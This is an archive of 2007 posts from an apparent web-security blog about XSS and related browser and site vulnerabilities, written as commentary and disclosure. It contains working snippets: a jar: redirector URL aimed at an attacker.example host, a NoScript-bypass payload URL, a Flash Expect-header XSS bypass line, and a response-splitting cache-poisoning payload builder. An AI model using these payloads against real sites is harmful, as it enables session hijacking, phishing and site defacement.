web application security lab

Archive for the 'XSS' Category

Open Redirectors Haunt Google Again, in Firefox

Sunday, November 11th, 2007

There are two really interesting threads, one on pdp’s site and one on Bedford’s site, about the use of Firefox’s jar: directive to inject bad content into other people’s sites (if they have redirectors in them). Pretty nasty stuff. Turning off all non-HTTP directives in Firefox is probably a good idea at this point, given the sheer number of holes that have been identified there.
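For the curious, a jar: URL pointed through a redirector looks roughly like this - the redirector path, archive name, and file name are all made up for illustration:

```javascript
// Illustrative shape of a jar: URL abusing an open redirector.
// Firefox fetches the archive through the redirector, and the "!/"
// separator picks which file inside the archive to render - in the
// security context of the domain the URL appears to come from.
const redirector =
  'http://www.google.com/url?q=http://attacker.example/payload.jar';
const jarUrl = 'jar:' + redirector + '!/page.html';

console.log(jarUrl);
```

The point being: the outer hostname the victim (and the browser's security model) sees is the trusted one, even though the archive contents came from somewhere else entirely.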

But this is just another in a long list of reasons why Google really does need to shut down these redirectors. Normally it just involves people losing their identities or attackers abusing the trust relationship people have with the Google.com domain. This one can actually steal your information from Google. I’ve been pushing them for three years now to fix these, and they still haven’t. Granted, this jar: post is really a browser issue and not a redirector issue on Google specifically, but why risk people’s safety when the only purpose of those redirectors is to track their users? I for one vote to shut the redirectors down. Anyway, very interesting articles by pdp and Bedford!

Interesting Video Of BeEF and a Rickroll

Sunday, November 4th, 2007

This is more amusing than anything, but if you aren’t familiar with the term Rickroll you should read this first. Click on the link in the article at your own risk - it’s very, very annoying. Basically it’s the same old link-bomb fun that we have all come to know and love, which stops the browser from closing by throwing tons of alerts (I’ve never been sure why the webpage gets to control whether the app closes or not). Anyway…

If you aren’t familiar with BeEF, Josh Abraham made a video of himself testing BeEF against his own browser. He shows how Rickrolls can be used against the user. We are assuming that at this point the attacker has already done everything they wanted to do against the user, and is now content with annoying them with obnoxious web pages. It’s a big video, but it definitely shows the power of BeEF as an attack platform.

Owning Ha.ckers.org - Or Not

Sunday, November 4th, 2007

Some people think I’m paranoid - as if the world is out to get me. Honestly, I’ve always just thought I had a healthy dose of reality. As a result I’ve taken some pretty insane precautions with this site to protect it from itself and its owners (myself and id). Thankfully, that time was well spent, although yesterday I realized it probably just wasn’t enough. Sirdarckcat and Kuza55 decided they wanted to own ha.ckers.org by defacing it. Alas, not only were they unsuccessful, but they were unsuccessful in several different ways. Here’s how it _should_ have worked.

First, they posted a relevant-looking comment on one of the posts with a link to a site that I wouldn’t recognize, to social engineer me into looking at it (http://ultimatehxr.googlepages.com/httpresponsespliting.html). Btw, thanks for hosting malicious content, Google - way to keep your site clean! Next, they pop open two iframes - one to the paper in question, which was actually written by someone else, and the other to a site (http://www.x.se/xjcj) that performs a redirection to Sirdarckcat’s site (http://www.sirdarckcat.net/blah2.html).

Next, the wannabes attempt to use the CSS history attack to detect whether I have posted to this site. In doing so (without JavaScript - thinking that I use NoScript for all my JavaScript protection) they pop open an iframe to my site (http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;), which exploits a vuln in NoScript. The “name” variable corresponds to a huge embedded payload. That payload contains an XMLHttpRequest that automatically posts their content to this site, with the additional bonus of a tracking pixel so they can see that it worked. Yup, that’s how it should have worked. Nope, it didn’t.

While we have some pretty insanely good mechanisms for protecting this site, ultimately we did have one hole, which was rectified by simply removing access to xss.swf. So if you used it for testing, I apologize - you can blame Sirdarckcat and Kuza55 for making your testing harder than it needs to be. I tried to provide access to tools, despite the additional personal burden of upkeep, but when they are abused I have to remove them.

So now the real question is what I should do about it. I went from being pissed off, to dumbfounded, and back again. I decided not to post this yesterday for a few reasons, but mostly to collect my thoughts, and I still haven’t come up with anything I’m particularly in love with. Clearly banning won’t work beyond IP bans and nuking their existing accounts on sla.ckers, both of which they could easily evade, so I’m a little short on options.

Do I publicly humiliate them? Do I remove all references to their pages everywhere on the site, since both of their sites should be considered malicious at this point? Do I post their docs? Do I test out the extradition treaties of Mexico and Australia (their respective countries)? Since they were doing it for credit, do I show all the ways in which they were insanely sloppy (like building a site with my name on it for testing - http://rsnakex.wordpress.com/)? Do I close up shop because my own readers are turning on me for no apparent reason (one of whom I had made a potential offer of a future position within my company - and no, that is no longer on the table)? I’m stumped. But one thing I do know - I’m not wearing a tinfoil hat for nothing.

More Expect Exploitation In Flash

Saturday, November 3rd, 2007

I traded a few emails with Titon (titon[at]bastardlabs.com) regarding the Expect XSS vulnerability in Flash against older versions of Apache. I hadn’t realized that Flash had closed down the Expect: header. It appears, however, that there is a way to resurrect that vulnerability. If you recall, the old syntax was:

req.addRequestHeader("Expect","<script>alert('XSS')</script>");

Well, it appears that is now blocked in current versions of Flash. However, Titon found a way around that:

req.addRequestHeader("Expect:FooBar","<script>alert('XSS')</script>");

It appears Flash was doing some sort of pattern match or direct string comparison on the header name, and by adding a colon and anything after it you can bypass the protection. Here is an example he created against SecurityFocus. So it looks like the vulnerability is back. It’s surprising how many sites are still vulnerable to this attack. So if you haven’t updated Apache and have any interest in security, you probably should. Nice work by Titon!
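My guess - and it is only a guess at Flash’s internals - is that the filter was an exact-match blacklist on the full header name that never considered the colon. A sketch of that kind of check:

```javascript
// Hypothetical sketch of a naive header blacklist, assuming an
// exact string comparison like the one Flash apparently used.
const BLOCKED_HEADERS = ['expect'];

function isHeaderBlocked(name) {
  // Compares the whole name verbatim - never splits on ":".
  return BLOCKED_HEADERS.includes(name.toLowerCase());
}

// "Expect" is caught, but "Expect:FooBar" slips through.
console.log(isHeaderBlocked('Expect'));        // true
console.log(isHeaderBlocked('Expect:FooBar')); // false
```

When the raw header line is later serialized as name + ": " + value, the smuggled name still begins with "Expect:", so a vulnerable Apache parses it as an Expect header anyway.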

Update: Amit alerted me to one of the old papers on Flash header injection. The paper came out a year ago. While I don’t think this is exactly the same, since this is talking about the Expect vuln, it is worth mentioning since it’s solved in almost an identical way.

OWASP New Jersey

Monday, October 29th, 2007

So I’m back from the OWASP New Jersey meeting at Verizon. One word - wow. It was a lot different than I thought it would be. I’ve been to dozens of OWASP meetings, and they really vary. I think the smallest meeting I’ve been to was 10 people, and now the biggest was the OWASP New Jersey meeting, run by Tom Brennan. The crowd was filled with suits (for once I felt like one of the least well-dressed people in the room). Lots of people from local industry (telecom, healthcare, etc…) as well as various three-letter agencies.

One thing that came up (that I had known about for a while, but for some reason just hasn’t been made super public yet) was some of the work Arian Evans has been doing with HTTP response splitting. When he started working with it he realized that he was inadvertently taking out huge chunks of the site with his own content. After some debugging he realized he was hitting caching servers (a la Amit Klein’s work). But there are two nasty things about that that go above and beyond what we knew before.

The first is that it can re-write the caching headers, so that instead of the 5 minute time-out you intended your caching server to use, it can be upped to months or years, causing a much larger problem. The second is that it is not a one-to-one but a one-to-many relationship. That is, you can take over pages that are well beyond the reach you normally have - including pages you don’t technically have access to - which can potentially give you access to anything under any user (the ultimate persistent XSS). Super nasty! So yah, I wasn’t sure how quiet that was supposed to stay, but Arian finally let the cat out of the bag, so there it is.
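To make the cache-poisoning angle concrete, here is a rough sketch of what such a splitting payload looks like on the wire. Everything here is hypothetical - the parameter name, URLs, and page body are invented - but the structure (CRLF-injected headers terminating the first response and smuggling a second, long-lived one) is the core of the technique:

```javascript
// Hypothetical sketch of a response-splitting payload that smuggles a
// second, cacheable response past an intermediary cache.
function buildSplitPayload() {
  const crlf = '\r\n';
  return '/redirect?dest=' + encodeURIComponent(
    'http://example.com/' + crlf +
    'Content-Length: 0' + crlf +
    crlf +
    // Everything below is the attacker's forged "second response".
    'HTTP/1.1 200 OK' + crlf +
    // The injected response dictates its own cache lifetime: a year,
    // instead of the site's intended short timeout.
    'Cache-Control: max-age=31536000' + crlf +
    'Content-Type: text/html' + crlf +
    crlf +
    '<html>attacker content</html>'
  );
}

console.log(buildSplitPayload());
```

If the cache associates that forged response with whatever URL it thinks it just fetched, the attacker’s content - and the attacker’s cache lifetime - is what every subsequent visitor gets.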

So it was a really good conference all in all, and definitely worth the hellish travel schedule to get out there. It’ll probably be smaller than the global OWASP meeting in November, of course, but for a simple regional meeting it was really impressive. I also hear rumors of a World CON in New York City next year. I, for one, am looking forward to it.

Update: I should go back and read all the old Amit papers. He came up with all of this stuff years ago. Is there anything that guy hasn’t done? His two papers are here and here.

TJMaxx XSS Vulnerability

Sunday, September 23rd, 2007

You know, normally I couldn’t care less about finding yet another XSS in some retailer site, but in this case I think it’s worth mentioning. There’s a documentary crew doing something on hackers that came to Austin and interviewed several people (not sure when it’s coming out, but I’ll probably mention it when it does). Anyway, during the interview I was asked to take a quick look at TJMaxx, and sure enough, within a few seconds I found this vuln:

Click here then click on the post forwarder as an example.

The ironies here are only obvious once you see TJMaxx’s page, which has a huge customer alert at the top. It’s a letter from TJX CEO Carol Meyrowitz:

We remain committed to providing our customers a safe shopping environment as you shop for great values, fashion and brands. TJX has been working diligently with some of the world’s best computer security firms to further enhance our computer security. We have also continued to work with law enforcement and government agencies and very much want to see that the sophisticated cyber criminals who attacked our computer systems are brought to justice.

I can’t comment on who is doing the audit work for TJMaxx, as I have no idea, but I doubt I’d call them the best in the world given the current state of the site. Anyhow, the real reason I mention this is that I have no evidence whatsoever that TJMaxx has actually been hurt by this event. If you look at the TJMaxx 1-year stock chart, not only did they recover from the huge security breach in Feb, but they’re actually up! Clearly, consumers and the investment community have decided to overlook their issues. Strange.

So perhaps the cost of data security isn’t worth it. I can only recall a few pieces of anecdotal evidence where people have said they’d never shop there as a result - and then they said they’d just never use their credit card there. So in the end, that works out in TJMaxx’s favor, because they don’t have to pay the transaction fees that the credit card companies impose. I don’t have insight into their financials (I guess I could dig up their public earnings statements), but I have a feeling that although this was relatively bad, it was barely a bump in their earnings. Perhaps their settlement cost them a little, but is it really enough to make them fix their holes? Clearly they’re still vulnerable to some things - and without knowing who is doing their security it’s tough to say how good or bad they are. Does this set a bad precedent? Is it that any publicity is good publicity - even if it puts millions of consumers at risk? What a mess!

Another XSS In Google Search Appliance

Friday, September 21st, 2007

$30,000 and vulnerabilities to boot! Google’s search appliance appears to be vulnerable to another XSS vulnerability, according to Mustlive’s disclosure. It comes complete with a Google dork. Not good. Mustlive has contacted Google, who to my knowledge has not let their customers know that they are vulnerable - if I’m wrong, someone please correct me.

Here are a few examples: gsa.icann.org and search.york.ac.uk.

This obviously puts any site that uses Google’s search appliance with this particular vulnerability in it at risk (there are, as of this writing, 186,000 listings on the Google dork). Time to patch up - once Google comes out with one, that is.

Overwriting Attributes

Thursday, August 30th, 2007

There’s an interesting thread on sla.ckers about how Firefox overwrites attributes. The short of it is that if you have attribute=”false” followed by attribute=”true”, the second attribute overwrites the first. This is definitely not the first time I’ve come across this, and if you think about it, it makes sense - one of them has to win, so it’s a tossup as to which one should. So for the most part I totally ignored that phenomenon, chalking it up as potentially problematic but difficult or impossible to exploit in any useful way. However, that was until this thread.

One thing that MySpace does, for instance, is add the attribute allowScriptAccess=”never” to any object tags, neutering their effectiveness in an attack. However, if you immediately follow it up with your own attribute allowScriptAccess=”always”, it will override MySpace’s security settings (I don’t know if there is a working exploit out there for this - it’s just an example as far as I know). However, now it’s clear that there could be situations where users are allowed to write into attributes of a tag that in all other ways prevents XSS, but that still let you change the functionality of the tag you are within. Clever attack!
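As a toy model of the behavior the thread describes - assuming a parser where a later duplicate attribute simply replaces the earlier one - the filter-vs-attacker interaction looks something like this:

```javascript
// Toy model of "last attribute wins" duplicate-attribute handling, as
// described for the Firefox of that era (this is a sketch of the
// behavior in the thread, not real browser internals).
function resolveAttributes(pairs) {
  const attrs = {};
  for (const [name, value] of pairs) {
    attrs[name.toLowerCase()] = value; // later duplicates overwrite
  }
  return attrs;
}

// The filter appends a hardening attribute, but user-controlled markup
// that comes after it wins under last-wins resolution.
const resolved = resolveAttributes([
  ['allowScriptAccess', 'never'],   // injected by the site's filter
  ['allowScriptAccess', 'always'],  // supplied by the attacker
]);
console.log(resolved.allowscriptaccess); // "always"
```

Note the ordering dependency: a filter that prepended its attribute instead of appending it would lose either way under one of the two possible tie-breaking rules, which is why relying on duplicate attributes for security is fragile.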

XSS and Possible Information Disclosure in Urchin

Thursday, August 23rd, 2007

Fredrick Young sent an interesting tidbit over to me today. Apparently all sites that run Urchin’s console are vulnerable to XSS. Urchin (recently bought by Google) is web tracking software designed for log analysis. It’s actually some of the best software out there in terms of speed of log analysis. I heard rumors that lots of the backend was originally coded in assembler. Cool stuff. Anyway, after a few minutes of looking I found an example of this out on the web. Click here for an example. This brings up a few interesting points.

Firstly, it’s not running on port 80 so the same origin policy is irrelevant. Secondly, lots of people use this software, and lots of the companies who use it need to be PCI compliant, which means that all of the companies who have exposed this interface are now failing PCI. Not so nice.
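For reference, the same origin policy compares the scheme/host/port tuple, which is why a console on a non-standard port is a different origin from the main site on port 80. A minimal sketch of the comparison, using the WHATWG URL parser:

```javascript
// Minimal sketch of the same-origin check: two URLs share an origin
// only if scheme, host, and port all match. example.com is used as a
// stand-in host.
function sameOrigin(a, b) {
  const ua = new URL(a);
  const ub = new URL(b);
  return ua.protocol === ub.protocol &&
         ua.hostname === ub.hostname &&
         ua.port === ub.port;
}

// A console on :9999 is a different origin from the site on :80.
console.log(sameOrigin('http://example.com/', 'http://example.com:9999/')); // false
// An explicit :80 is the default for http, so it's the same origin.
console.log(sameOrigin('http://example.com/', 'http://example.com:80/'));   // true
```

So an XSS on the high-port console can’t directly reach the port-80 site’s cookies, but the console itself - and everything it exposes - is still fair game.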

Also, when locating this particular example, I noticed that the password protection doesn’t appear to actually stop you from viewing the logs directly, as you can see here. Bummer. Being able to read logs could lead to disclosure of hidden files, internal IP addresses, and all kinds of other things submitted on the URL. Looks like Urchin needs a few patches. I actually like this software a lot, and if I had lots of money I’d probably buy it. It’s the same back end as Google Analytics, minus the fact that Google can spy on you and your users. But it’s got a few issues.

XSS Hole In Google Apps Is “Expected Behavior”

Friday, August 17th, 2007

You know, just when I think I’m being a super nice guy, going out of my way to go through responsible disclosure, I am slapped in the face with the exact reason why I don’t think responsible disclosure works for some companies. Certain companies I have worked with are ultra-responsive, understand risk, and do their absolute best to combat anything that may be used to harm them or their consumers. Then there’s Google:

Hi RSnake,

On further review, it turns out that this is not a bug, but instead the expected behavior of this domain. Javascript is a supported part of Google modules, as seen, for example, here: http://www.google.com/apis/maps/documentation/mapplets/#Hello_World_of_Mapplets. Since these modules reside on the gmodules.com domain instead of the Google domain, cross-domain protection stops them from being used to steal Google-specific cookies, etc. If you do find a way of executing this code from the context of a google.com domain, though, please let us know.

If I misunderstood the report in any way, please don’t hesitate to correct me. For the moment, though, I’m closing this issue. Thanks for sending this over.

Regards,
The Google Team

BZZZT! Wrong answer. Thank you for playing, though. On further review, Google needs to figure out what XSS is used for - it’s not just for credential theft. You couldn’t make this stuff up if you tried. Putting phishing sites on gmodules.com is apparently expected behavior. My favorite part of this email is where Google explains to me how cross-domain policies work. I’m simply not impressed. Click here to see the XSS hole. I’ll let the JavaScript injected on Google-branded domains do the talking for me.

So for anyone interested in exploiting this non-bug: they would tell people to add their own modules, which are hijacked, of course, allowing them to take over other people’s websites when they embed the erroneous third-party code. Kinda nasty. Unlikely, but nasty. More likely it would simply be used in phishing sites that didn’t want their own sites taken down, but wanted Google’s to be taken down instead. For the record, this is not the first time I have responsibly disclosed issues to Google, and this is the third time they have said what I reported was either not a bug or too hard to fix. So much for using responsible disclosure with Google. Ugh.